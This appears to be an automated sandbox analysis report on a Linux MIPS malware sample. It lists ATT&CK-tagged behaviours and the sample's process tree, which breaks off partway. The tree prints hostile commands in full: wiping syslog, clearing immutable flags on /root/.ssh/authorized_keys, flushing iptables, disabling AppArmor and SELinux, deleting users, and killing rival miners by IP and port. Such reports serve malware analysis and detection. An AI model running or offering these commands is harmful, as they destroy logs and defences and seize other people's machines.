7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5

Analysis

max time kernel
94s
max time network
124s
platform
debian-9_mips
resource
debian9-mipsbe-20240729-en
resource tags

arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
29-09-2024 11:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
Size

27KB
MD5

fe70c19936ef32efb00f3c75ea90e701
SHA1

461514742ae77741e53efb6975ffd8d3db264c92
SHA256

7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5
SHA512

dad1271c0984f3120dc0c35725212fdccf707b4c3e5ecc6b1fe9e5ba95b295398d17fdac46c767375268fb1577128d23aa519ebfabc881a3b11e78de1b6a8f4b
SSDEEP

384:G7pQQwQHDf6jlpTWg3vMGQiKMvh/4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeD:G7JoFNcDvFLcIwgiYq0xzBWjzr2W

Score

7^/10

defense_evasion discovery execution persistence privilege_escalatio privilege_escalation

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

pid process

2144
2150
Executes dropped EXE 1 IoCs

Processes:

ioc pid process

/usr/bin/salt-store 2155
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
defense_evasion

Disable or Modify System Firewall
T1562.004

Processes:

iptables

pid process

721 iptables
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
privilege_escalation defense_evasion

Sudo and Sudo Caching
T1548.003

Processes:

sudo

pid process

727 sudo

pid	process
2144
2150

ioc	pid	process
/usr/bin/salt-store	2155

pid	process
721	iptables

pid	process
727	sudo

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargschattrxargsxargsxargsxargsxargschattrxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargs

pid	process
1066	xargs
1208	xargs
1213	xargs
1443	xargs
1662	xargs
854	xargs
889	xargs
899	xargs
1780	xargs
1674	xargs
1680	xargs
1744	xargs
1588	xargs
1720	xargs
1782	xargs
2019
872	xargs
1230	xargs
1346	xargs
1698	xargs
1706	xargs
1768	xargs
2109
715	chattr
1004	xargs
1111	xargs
1385	xargs
1688	xargs
1722	xargs
2101
753	chattr
782	xargs
1373	xargs
1736	xargs
1752	xargs
2073
1379	xargs
1553	xargs
1718	xargs
1090	xargs
1490	xargs
1672	xargs
2029
770	xargs
788	xargs
904	xargs
966	xargs
1508	xargs
991	xargs
1052	xargs
924	xargs
1392	xargs
1702	xargs
1598	xargs
1732	xargs
1740	xargs
842	xargs
1593	xargs
1637	xargs
1461	xargs
2037
2085
1203	xargs
1656	xargs

Creates/modifies Cron job 1 TTPs 22 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.Gth3RG
File opened for modification	/var/spool/cron/crontabs/tmp.SoMxoI
File opened for modification	/var/spool/cron/crontabs/tmp.fhKMQo
File opened for modification	/var/spool/cron/crontabs/tmp.pT4teK
File opened for modification	/var/spool/cron/crontabs/tmp.v4ES3t
File opened for modification	/var/spool/cron/crontabs/tmp.HCl7Fr
File opened for modification	/var/spool/cron/crontabs/tmp.QwGskd
File opened for modification	/var/spool/cron/crontabs/tmp.aOekth
File opened for modification	/var/spool/cron/crontabs/tmp.t5AQrX
File opened for modification	/var/spool/cron/crontabs/tmp.uviz7A
File opened for modification	/var/spool/cron/crontabs/tmp.yEpEhX
File opened for modification	/var/spool/cron/crontabs/tmp.YsGDuh
File opened for modification	/var/spool/cron/crontabs/tmp.smEl61
File opened for modification	/var/spool/cron/crontabs/tmp.FlKOue
File opened for modification	/var/spool/cron/crontabs/tmp.RKVHVD
File opened for modification	/var/spool/cron/crontabs/tmp.iadoMP
File opened for modification	/var/spool/cron/crontabs/tmp.ctChMc
File opened for modification	/var/spool/cron/crontabs/tmp.R86iA4
File opened for modification	/var/spool/cron/crontabs/tmp.HGzAwW
File opened for modification	/var/spool/cron/crontabs/tmp.BcCSnR
File opened for modification	/var/spool/cron/crontabs/tmp.tlIXqf
File opened for modification	/var/spool/cron/crontabs/tmp.itsFVq

Disables AppArmor 16 IoCs
Disables AppArmor security module.

Processes:

pid process

2111
2119
2111
2111
2111
2122
2124
2119
2119
2119
2118
2126
2111
2111
2119
2119
Disables SELinux 1 TTPs 1 IoCs
Disables SELinux security module.
defense_evasion

Disable or Modify Tools
T1562.001

Processes:

pid process

2110
Enumerates running processes
Discovers information about currently running processes on the system
Write file to user bin folder 2 IoCs
persistence

Processes:

description ioc process

File opened for modification /usr/bin/salt-store
File opened for modification /usr/bin/salt-store

pid	process
2111
2119
2111
2111
2111
2122
2124
2119
2119
2119
2118
2126
2111
2111
2119
2119

pid	process
2110

description	ioc	process
File opened for modification	/usr/bin/salt-store
File opened for modification	/usr/bin/salt-store

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

pgreppgreppkillpspspspgreppspgreppkillexim4pkillpskillpgreppgreppspspkillpspgreppkillpkillpspgreppkillpspspkillpspspgreppgreppkillpkillpspspspspspgreppgreppspspspspgreppspspspgreppgreppgreppgreppkillpgreppkillexim4

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	exim4

Enumerates kernel/hardware configuration 1 TTPs 8 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

description	ioc	process
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus
File opened for reading	/sys/fs/kdbus/0-system/bus

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

pid	process
968	ps
759	ps
885	ps
905	ps
1221	ps
1099	ps
1133	ps
1154	ps
1533	ps
1554	ps
1261	ps
1420	ps
910	ps
1209	ps
1333	ps
1503	ps
1077	ps
1188	ps
1462	ps
1474	ps
962	ps
1086	ps
1288	ps
1348	ps
1362	ps
1375	ps
1515	ps
1015	ps
1144	ps
1241	ps
1341	ps
1450	ps
1022	ps
890	ps
946	ps
1062	ps
1485	ps
1521	ps
1159	ps
1168	ps
1214	ps
1246	ps
1407	ps
1539	ps
1048	ps
1149	ps
900	ps
951	ps
987	ps
1282	ps
1114	ps
1199	ps
1326	ps
1369	ps
1564	ps
925	ps
1068	ps
1426	ps
1444	ps
1456	ps
936	ps
1121	ps
1236	ps
1302	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pspspgreppkillpkillpspgreppkillpkillpspgreppkillpkillpspgreppgreppspspspkillpkillpspspspspspgreppgreppspspspspspspspspspspspkillpspspspsawkpgreppgreppgreppspspgreppgreppspspsps

description	ioc	process
File opened for reading	/proc/714/status	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/437/status	pgrep
File opened for reading	/proc/382/status	pkill
File opened for reading	/proc/711/status	pkill
File opened for reading	/proc/21/status
File opened for reading	/proc/678/status	ps
File opened for reading	/proc/110/status	ps
File opened for reading	/proc/21/cmdline	pgrep
File opened for reading	/proc/19/cmdline	pkill
File opened for reading	/proc/18/status	pkill
File opened for reading	/proc/1449/status	ps
File opened for reading	/proc/155/status	pgrep
File opened for reading	/proc/372/cmdline	pkill
File opened for reading	/proc/158/cmdline	pkill
File opened for reading	/proc/237/cmdline
File opened for reading	/proc/73/status	ps
File opened for reading	/proc/sys/kernel/osrelease	pgrep
File opened for reading	/proc/3/cmdline	pkill
File opened for reading	/proc/5/status	pgrep
File opened for reading	/proc/18/stat	ps
File opened for reading	/proc/711/stat	ps
File opened for reading	/proc/5/cmdline	ps
File opened for reading	/proc/10/status	pkill
File opened for reading	/proc/110/status	pkill
File opened for reading	/proc/372/status
File opened for reading	/proc/17/status	ps
File opened for reading	/proc/437/status	ps
File opened for reading	/proc/17/status	ps
File opened for reading	/proc/75/stat	ps
File opened for reading	/proc/126/cmdline	ps
File opened for reading	/proc/73/cmdline	pgrep
File opened for reading	/proc/237/cmdline	pgrep
File opened for reading	/proc/155/status	ps
File opened for reading	/proc/11/status	ps
File opened for reading	/proc/1288/cmdline	ps
File opened for reading	/proc/tty/drivers	ps
File opened for reading	/proc/388/cmdline	ps
File opened for reading	/proc/371/status	pkill
File opened for reading	/proc/82/cmdline	ps
File opened for reading	/proc/71/status	ps
File opened for reading	/proc/125/cmdline	ps
File opened for reading	/proc/1345/status	ps
File opened for reading	/proc/37/status	ps
File opened for reading	/proc/37/status	ps
File opened for reading	/proc/15/cmdline	pkill
File opened for reading	/proc/340/cmdline
File opened for reading	/proc/73/stat	ps
File opened for reading	/proc/341/cmdline
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/707/stat	ps
File opened for reading	/proc/16/stat	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/675/status	pgrep
File opened for reading	/proc/sys/kernel/osrelease	pgrep
File opened for reading	/proc/15/cmdline	pgrep
File opened for reading	/proc/6/cmdline	ps
File opened for reading	/proc/125/status	ps
File opened for reading	/proc/7/cmdline	pgrep
File opened for reading	/proc/710/cmdline	pgrep
File opened for reading	/proc/126/cmdline	ps
File opened for reading	/proc/175/stat	ps
File opened for reading	/proc/80/cmdline	ps
File opened for reading	/proc/714/cmdline	ps

System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

grepgrepgrep

pid process

1928
1123 grep
1156 grep
1390 grep
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118

description ioc process

File opened for modification /tmp/log_rot fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118

pid	process
1928
1123	grep
1156	grep
1390	grep

description	ioc	process
File opened for modification	/tmp/log_rot	fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118

/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:711

/bin/rm
rm -rf /var/log/syslog
2⤵
PID:713

/usr/bin/chattr
chattr -iua /tmp/
2⤵
- Attempts to change immutable files
PID:715

/usr/bin/chattr
chattr -iua /var/tmp/
2⤵
PID:719

/sbin/iptables
iptables -F
2⤵
- Flushes firewall rules
PID:721

/usr/bin/sudo
sudo sysctl "kernel.nmi_watchdog=0"
2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:727

/usr/sbin/sendmail
sendmail -t
3⤵
PID:738

/usr/sbin/exim4
/usr/sbin/exim4 -Mc 1suqJW-0000Bu-3X
4⤵
- Reads CPU attributes
PID:750

/usr/sbin/sendmail
sendmail -t
3⤵
PID:742

/usr/sbin/exim4
/usr/sbin/exim4 -Mc 1suqJW-0000By-2o
4⤵
- Reads CPU attributes
PID:751

/sbin/sysctl
sysctl "kernel.nmi_watchdog=0"
3⤵
PID:744

/usr/sbin/userdel
userdel akay
2⤵
PID:746

/usr/sbin/userdel
userdel vfinder
2⤵
PID:748

/usr/bin/chattr
chattr -iae /root/.ssh/
2⤵
PID:752

/usr/bin/chattr
chattr -iae /root/.ssh/authorized_keys
2⤵
- Attempts to change immutable files
PID:753

/bin/rm
rm -rf "/tmp/addres*"
2⤵
PID:755

/bin/rm
rm -rf "/tmp/walle*"
2⤵
PID:757

/bin/rm
rm -rf /tmp/keys
2⤵
PID:758

/bin/grep
grep -i "[a]liyun"
2⤵
PID:760

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:759

/bin/grep
grep -i "[y]unjing"
2⤵
PID:763

/bin/ps
ps aux
2⤵
PID:762

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:769

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:768

/bin/grep
grep 185.71.65.238
2⤵
PID:767

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:770

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:775

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:774

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:773

/bin/grep
grep 140.82.52.87
2⤵
PID:772

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:782

/bin/grep
grep -v -
2⤵
PID:781

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:780

/bin/grep
grep :443
2⤵
PID:778

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:779

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:788

/bin/grep
grep -v -
2⤵
PID:787

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:786

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:785

/bin/grep
grep :23
2⤵
PID:784

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:794

/bin/grep
grep -v -
2⤵
PID:793

/bin/grep
grep :443
2⤵
PID:790

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:792

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:791

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:798

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:797

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:800

/bin/grep
grep -v -
2⤵
PID:799

/bin/grep
grep :143
2⤵
PID:796

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:806

/bin/grep
grep -v -
2⤵
PID:805

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:804

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:803

/bin/grep
grep :2222
2⤵
PID:802

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:812

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:810

/bin/grep
grep -v -
2⤵
PID:811

/bin/grep
grep :3333
2⤵
PID:808

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:809

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:818

/bin/grep
grep -v -
2⤵
PID:817

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:816

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:815

/bin/grep
grep :3389
2⤵
PID:814

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:824

/bin/grep
grep -v -
2⤵
PID:823

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:822

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:821

/bin/grep
grep :4444
2⤵
PID:820

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:830

/bin/grep
grep -v -
2⤵
PID:829

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:828

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:827

/bin/grep
grep :5555
2⤵
PID:826

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:836

/bin/grep
grep -v -
2⤵
PID:835

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:833

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:834

/bin/grep
grep :6666
2⤵
PID:832

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:842

/bin/grep
grep -v -
2⤵
PID:841

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:840

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:839

/bin/grep
grep :6665
2⤵
PID:838

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:848

/bin/grep
grep -v -
2⤵
PID:847

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:846

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:845

/bin/grep
grep :6667
2⤵
PID:844

/bin/grep
grep -v -
2⤵
PID:853

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:854

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:852

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:851

/bin/grep
grep :7777
2⤵
PID:850

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:860

/bin/grep
grep -v -
2⤵
PID:859

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:858

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:857

/bin/grep
grep :8444
2⤵
PID:856

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:866

/bin/grep
grep -v -
2⤵
PID:865

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:864

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:863

/bin/grep
grep :3347
2⤵
PID:862

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:872

/bin/grep
grep -v -
2⤵
PID:871

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:870

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:869

/bin/grep
grep :14444
2⤵
PID:868

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:878

/bin/grep
grep -v -
2⤵
PID:877

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:876

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:875

/bin/grep
grep :14433
2⤵
PID:874

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:884

/bin/grep
grep -v -
2⤵
PID:883

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:882

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:881

/bin/grep
grep :13531
2⤵
PID:880

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:889

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:888

/bin/grep
grep -v grep
2⤵
PID:887

/bin/grep
grep "sleep 60"
2⤵
PID:886

/bin/ps
ps aux
2⤵
- Process Discovery
PID:885

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:894

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:893

/bin/grep
grep -v grep
2⤵
PID:892

/bin/grep
grep ./crun
2⤵
PID:891

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:890

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:899

/usr/bin/awk
awk "{if(\$3>80.0) print \$2}"
2⤵
PID:898

/bin/grep
grep -v grep
2⤵
PID:897

/bin/grep
grep -vw salt-minions
2⤵
PID:896

/bin/ps
ps aux
2⤵
PID:895

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:904

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:903

/bin/grep
grep :3333
2⤵
PID:902

/bin/grep
grep -v grep
2⤵
PID:901

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:900

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:909

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:908

/bin/grep
grep :5555
2⤵
PID:907

/bin/grep
grep -v grep
2⤵
PID:906

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:905

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:914

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:913

/bin/grep
grep "kworker -c\\"
2⤵
PID:912

/bin/grep
grep -v grep
2⤵
PID:911

/bin/ps
ps aux
2⤵
- Process Discovery
PID:910

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:919

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:918

/bin/grep
grep log_
2⤵
PID:917

/bin/grep
grep -v grep
2⤵
PID:916

/bin/ps
ps aux
2⤵
PID:915

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:924

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:923

/bin/grep
grep systemten
2⤵
PID:922

/bin/grep
grep -v grep
2⤵
PID:921

/bin/ps
ps aux
2⤵
PID:920

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:929

/usr/local/sbin/kill
kill -9 10
3⤵
PID:930

/usr/local/bin/kill
kill -9 10
3⤵
PID:930

/usr/sbin/kill
kill -9 10
3⤵
PID:930

/usr/bin/kill
kill -9 10
3⤵
PID:930

/sbin/kill
kill -9 10
3⤵
PID:930

/bin/kill
kill -9 10
3⤵
PID:930

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:928

/bin/grep
grep netns
2⤵
PID:927

/bin/grep
grep -v grep
2⤵
PID:926

/bin/ps
ps aux
2⤵
- Process Discovery
PID:925

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:935

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:934

/bin/grep
grep voltuned
2⤵
PID:933

/bin/grep
grep -v grep
2⤵
PID:932

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:931

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:940

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:939

/bin/grep
grep darwin
2⤵
PID:938

/bin/grep
grep -v grep
2⤵
PID:937

/bin/ps
ps aux
2⤵
- Process Discovery
PID:936

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:945

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:944

/bin/grep
grep /tmp/dl
2⤵
PID:943

/bin/grep
grep -v grep
2⤵
PID:942

/bin/ps
ps aux
2⤵
PID:941

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:950

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:949

/bin/grep
grep /tmp/ddg
2⤵
PID:948

/bin/grep
grep -v grep
2⤵
PID:947

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:946

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:955

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:954

/bin/grep
grep /tmp/pprt
2⤵
PID:953

/bin/grep
grep -v grep
2⤵
PID:952

/bin/ps
ps aux
2⤵
- Process Discovery
PID:951

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:960

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:959

/bin/grep
grep /tmp/ppol
2⤵
PID:958

/bin/grep
grep -v grep
2⤵
PID:957

/bin/ps
ps aux
2⤵
PID:956

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:966

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:965

/bin/grep
grep "/tmp/65ccE*"
2⤵
PID:964

/bin/grep
grep -v grep
2⤵
PID:963

/bin/ps
ps aux
2⤵
- Process Discovery
PID:962

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:972

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:971

/bin/grep
grep "/tmp/jmx*"
2⤵
PID:970

/bin/grep
grep -v grep
2⤵
PID:969

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:968

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:979

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:978

/bin/grep
grep "/tmp/2Ne80*"
2⤵
PID:977

/bin/grep
grep -v grep
2⤵
PID:976

/bin/ps
ps aux
2⤵
PID:975

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:986

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:985

/bin/grep
grep IOFoqIgyC0zmf2UR
2⤵
PID:984

/bin/grep
grep -v grep
2⤵
PID:983

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:982

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:991

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:990

/bin/grep
grep 45.76.122.92
2⤵
PID:989

/bin/grep
grep -v grep
2⤵
PID:988

/bin/ps
ps aux
2⤵
- Process Discovery
PID:987

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:998

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:997

/bin/grep
grep 51.38.191.178
2⤵
PID:996

/bin/grep
grep -v grep
2⤵
PID:995

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:994

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1004

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1003

/bin/grep
grep 51.15.56.161
2⤵
PID:1002

/bin/grep
grep -v grep
2⤵
PID:1001

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1000

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1010

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1009

/bin/grep
grep 86s.jpg
2⤵
PID:1008

/bin/grep
grep -v grep
2⤵
PID:1007

/bin/ps
ps aux
2⤵
PID:1006

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1019

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1018

/bin/grep
grep aGTSGJJp
2⤵
PID:1017

/bin/grep
grep -v grep
2⤵
PID:1016

/bin/ps
